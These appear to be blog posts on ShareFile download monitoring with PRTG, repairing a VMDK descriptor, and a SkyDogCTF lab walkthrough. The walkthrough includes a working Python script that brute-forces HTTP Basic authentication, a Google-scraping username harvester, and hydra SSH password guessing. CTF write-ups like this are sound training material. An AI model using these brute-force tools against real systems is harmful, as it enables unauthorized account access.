Saturday, May 6, 2017

Trending ShareFile Downloads with PowerShell and PRTG


I’d like to trend the amount of time it takes to download a file from my on premise storage zones vs the amount of time it takes to download a file from ShareFile’s public cloud.  So here’s the plan, I’m going to create some shared folders on each of the storage zones I want to trend…

I’ll create a shared folder on ShareFile’s “US East” zone…
image

I’ll create a shared folder on my customer managed storage zone…
image

Notice in the screenshots above I’m disabling any retention policies.

I’ll upload the same file to each shared folder I created…

ShareFile US East

image

Storage Zone 1
image

Next, I’m going to grab the freeware version of PRTG and install it.  The installation is pretty straight forward… https://www.paessler.com

Then I’m going to download and install the ShareFile PowerShell Snapin from Github…https://github.com/citrix/ShareFile-PowerShell/releases

You need the x86 version.  At the time of this post, version 1.82 has an x86 and x64 version.  I usually install both but x86 is required for integration with PRTG.

Open PowerShell x86 and set the execution policy to unrestricted (make sure you “run as administrator”).  The execution policy modification is needed for PRTG.  I did not test with other execution policies.
image

I’m going to use a ShareFile “service account” and generate a .sfps file using the New-SfClient command as documented in the ShareFile PowerShell SDK wiki found here… https://github.com/citrix/ShareFile-PowerShell/wiki/Getting-Started; It’s a simple process so I’m not going to include it in this post.  I’m also using a bit of the code from one of the sample scripts.

Now, I’ll write a PowerShell script which times the downloads of the files from each zone.  I’m going to execute the script using PRTG which will record and chart the script output. 

I’m going to need a place to temporarily store files the script downloads so I’ll create a temp directory structure.  I created a couple directories D:\temp\ShareFile_US_East and D:\temp\Storage_Zone_1.

I’m also giving the folders a name similar to the name of the zone.  This is important because I’ll be using this in the script for the PRTG channel label.
image
Here’s the PowerShell Script

I’ll put the script on the PRTG server in the following directory (this may vary on your system): C:\Program Files (x86)\PRTG Network Monitor\Custom Sensors\EXEXML

Open the PRTG Enterprise Console…
image

Create a group…
image

Create a device in the group…
image

Add an EXE/Script Advanced sensor to the device
image

Set the sensor settings – define EXE/Script, timeout, scanning interval
image

And that’s it.  You should start seeing data in the PRTG console.

Here’s an example of some download times for a standard customer managed storage zone versus a ShareFile cloud managed storage zone.  This actually shows a trend with higher than expected download times for the standard storage zone.  Adjustments were made and you can see the download times decrease.

image

Saturday, December 24, 2016

ConvertTo-MvmcVirtualHardDisk: The entry is not a supported disk database entry for the descriptor.

I’ve ran into this issue twice now when trying to convert an ova into a vhd using ConvertTo-MvmcVirtualHardDisk.

Here’s what happens…

I download the ova, rename the file to .zip and extract the contents.  The virtual machines have typically been created/tested with Virtual Box so the archive usually includes an ovf and vmdk.

I open PowerShell and attempt to use ConvertTo-MvmcVirtualHardDisk but run into this error:

image

Here’s how to fix it.

1. Download dsfok-tools by Dariusz Stanislawek and extract the contents of the archive.

2. Run cmd.exe as administrator

3. Extract descriptor1.txt from the vmdk using dsfo.exe

image

4. Make a backup copy of descriptor1.txt.  If anything goes wrong just inject the backup.

5. Open descriptor1.txt (using NotePad++)

image

6. Comment all the lines after #DDB, delete the NUL and any “white space” at the end of the file.  Save the file.

image

7. Inject descriptor1.txt into the vmdk using dsfi.exe

image

8. Convert the vmdk to vhd

image

9. Create the virtual machine, attach the disk and boot the machine.

image

SkyDogCTF Walkthrough

 

This is the first time I’ve attempted a CTF.  Here’s a walkthrough for each flag.

Nmap scan…

image

SSH on port 22222 – Found flag #1 flag{53c82eba31f6d416f331de9162ebe997}

image

Cracked the hash – “encrypt”

 findmyhash md5 -h 53c82eba31f6d416f331de9162ebe997  

image

I pulled the index.html file with wget and found a comment about IE4 and /oldIE/html5.js

image

Reviewed the js file; the first line is hex…

image

Decoded the hex and found flag #2 flag{7c0132070a0ef71d542663e9dc1f5dee}

image

Cracked the hash – “nmap”

image

DIRB scan… and found /personnel

image

Tried to access /personnel but it seems to be “protected”

image

I assume “IE4” was a clue so I tried accessing /personnel with an IE4 user agent – found flag#3 flag{14e10d570047667f904261e6d08f520f} and another clue – so far so good.

image

I decided to take a look with FireFox… Agent Hanratty

image

Cracked the hash – “evidence” …  Clue = new + flag = newevidence

image

I tried to access /newevidence with IE4 user agent – 401 Unauthorized

image

Same using Burp Suite (using proxy to manipulate user agent) and FireFox

image

Tried to logon, hanratty:hanratty, didn’t work;

image

What is Agent Hanratty’s first name? Google says it’s Carl

image

I setup Burp Suite Intruder in an attempt to gain access but the free version is pretty slow…

image

… so I wrote a crude script in Python.  This let me try several username combinations with a couple dirb word lists for the password.  I got lucky with username “carl.hanratty” and password “Grace”.

image

 import subprocess;  
 import os;  
 import base64;  
 import time;  
 username = 'carl.hanratty'  
 seperator = ':'  
 count = 0  
 filename = '/usr/share/wordlists/dirb/others/names.txt'  
 target = 'http://192.168.12.12/newevidence'  
 #headers  
 useragent = '--user-agent=Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)'  
 accept = '--header=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'  
 acceptlang = '--header=Accept-Language: en-US,en;q=0.5'  
 acceptenc = '--header=Accept-Encoding: gzip, deflate'  
 connection = '--header=Connection: close'  
 with open(filename) as fp:  
   for line in fp:  
     password = line.replace("\n","")  
     creds = username + ":" + password  
     b64 = "%s" % (base64.b64encode(creds.encode('ascii')))  
     print "Trying %s %s" % (creds,b64)  
     auth = "--header=Authorization: Basic %s" % (b64)  
     try:  
       subprocess.check_output(['wget',target,useragent,accept,acceptlang,acceptenc,connection,auth])  
     except:  
       pass  
     if os.path.isfile("/root/Desktop/scripts/newevidence"):  
       break  
     count += 1  
     #time.sleep(1)  

I took a look with FireFox…

image

Checked out the hyperlink “Evidence Summary File” - found flag #4 flag{117c240d49f54096413dd64280399ea9}

image

Cracked the hash – “panam”

image

The hyperlink “Possible Location” links to an image.jpg, saved it, ran it through binwalk and then steghide with password “panam”.  found flag #5 flag{d1e5146b171928731385eb7ea38c37b8} and another clue.  So far, the cracked hashes are clues for the next flag but…

image

I got stuck here for a bit and tried a bunch of things.  I ended up taking things back to the beginning with nmap.

I wasn’t sure why the server was running HTTPS; everything I found so far was accessible over HTTP.  I took a look using openssl s_client and found flag #6 flag{f82366a9ddc064585d54e3f78bde3221}. 

image

Since it’s labeled “flag3” - I was supposed to find it earlier in the game – better late than never.

Cracked the hash – “personnel” – HA! yes, this was a clue for earlier.  Thank goodness dirb found the directory.

image

Stuck again… decided to give SSH a whirl… meh.  Brute force here we come…

I tried some standard name lists with various combos of username formats with the cracked hashes and clues as passwords.  It was taking too long; the username list had too many names.  I need to be more specific…

I wrote a Powershell script which queried Google looking for names related to the search strings I provided… (cheating? maybe… I didn’t review the results to see if anything was related to SkyDogCTF).

 $searchstrings = @(  
  "%22agent+hanratty%22",  
  "%22catch+me+if+you+can%22",  
  "%22Dont+go+Home+Frank%22",  
  "%22Theres+a+Hex+on+Your+House%22",  
  "%22Obscurity+or+Security%22",  
  "%22Be+Careful+Agent+Frank+Has+Been+Known+to+Intercept+Traffic+Our+Traffic%22",  
  "%22A+Good+Agent+is+Hard+to+Find%22",  
  "%22The+Devil+is+in+the+Details+Or+is+it+Dialogue%22",  
  "%22if+its+Simple+Guessable+or+Personal+it+Goes+Against+Best+Practices%22",  
  "%22Where+in+the+World+is+Frank%22",  
  "%22Frank+Was+Caught+on+Camera+Cashing+Checks+and+Yelling%22",  
  "%22The+Fastest+Man+Alive%22",  
  "%22Franks+Lost+His+Mind+or+Maybe+its+His+Memory%22",  
  "%22He+Locked+Himself+Inside+the+Building%22",  
  "%22Find+the+Code+to+Unlock+the+Door+Before+He+Gets+Himself+Killed%22",  
  "%22encrypt%22",  
  "%22nmap%22",  
  "%22personnel%22",  
  "%22newevidence%22",  
  "%22panam%22",  
  "%22iheartbrenda%22",  
  "%22ILoveFrance%22"  
 )  
 $names = gc C:\temp\names.txt  
 $googlenames = $null  
 $firstnamelastnames = @()  
 $googlednames = @()  
 $i = 1  
 $totalsearches = $searchstrings.count  
 foreach($searchstring in $searchstrings)  
 {  
  write-host "Searching Google [$i of $totalsearches]... " -foregroundcolor Green  
  $googlesays = (Invoke-WebRequest "https://www.google.com/search?q=$searchstring" -useragent ([Microsoft.PowerShell.Commands.PSUserAgent]::InternetExplorer))  
  $googlenames += $names | ?{$googlesays.rawcontent.contains($_)}  
  $f = 1  
  $totalnames = $googlenames.count  
  $l = $1  
  write-host " Parsing Results..." -ForegroundColor Cyan  
  #look for "firstname lastname"  
  foreach($firstname in $googlenames)  
  {  
   if($googlesays.rawcontent.contains("$firstname") -eq $true)  
   {  
    $googlednames += "$firstname"  
   }  
   foreach($lastname in $googlenames)  
   {  
    if($googlesays.rawcontent.contains("$firstname $lastname") -eq $true)  
    {  
     $firstnamelastnames += "$firstname $lastname"  
    }  
   }  
  }  
  write-host "...Sleeping" -foregroundcolor Red  
  start-sleep -seconds 2  
  $i++  
 }  
 $firstlast = ($firstnamelastnames | Group-Object).Name.replace(" ","")  
 #$first_space_last = ($firstnamelastnames | Group-Object).Name  
 $first_dot_last = ($firstnamelastnames | Group-Object).Name.replace(" ",".")  
 $first_underscore_last = ($firstnamelastnames | Group-Object).Name.replace(" ","_")  
 $firstlast += $firstlast.tolower() + $firstlast.toupper()  
 #$first_space_last += $first_space_last.tolower() + $first_space_last.toupper()  
 $first_dot_last += $first_dot_last.tolower() + $first_dot_last.toupper()  
 $first_underscore_last += $first_underscore_last.tolower() + $first_underscore_last.toupper()  
 $firstlast  
 #$first_space_last  
 #$first_dot_last  
 #$first_underscore_last  
 #$googlednames | Group-Object  

… this gave me a smaller list of usernames.  It was taking about 2 minutes to run ~200 usernames with one password at the default of 16 tasks in hydra.  I wasn’t sure of the username format so I used a couple variations and ended up with ~600 usernames and 8 passwords.  Again, I used the previous cracked hashes and clues for the password list.  I kicked hydra off and headed to bed.

The next day… ugh.  No hits but looking back through the logs I see a bunch of failures, reattempts, etc.  To make a long story short, I rebooted the server and tried the  user list with each password using the –p switch.  I also throttled tasks down to 1.  I was finally able to run through the lists with a smaller number of failures/reattempts.  I’ll have to revisit this again in the future… anyhow, I got a hit.

image

SSH to the server with the credentials for barryallen; Found flag #7 flag{bd2f6a1d5242c962a05619c56fa47ba6}

image

Cracked the hash – “theflash”

image

The last flag has to be in the security-system.data file; so I downloaded it

image

Ran it through binwalk; appears to be a zip archive

image

Unzip and binwalk… looks like a dmp?

image

Ran it through volatility

image

Dumped the clipboard contents… “666c61677b38343164643364623239623066626264383963376235626537363863646338317d”

image

found flag #8 flag{841dd3db29b0fbbd89c7b5be768cdc81}

image

Attempted to crack the hash… not a known hash.

image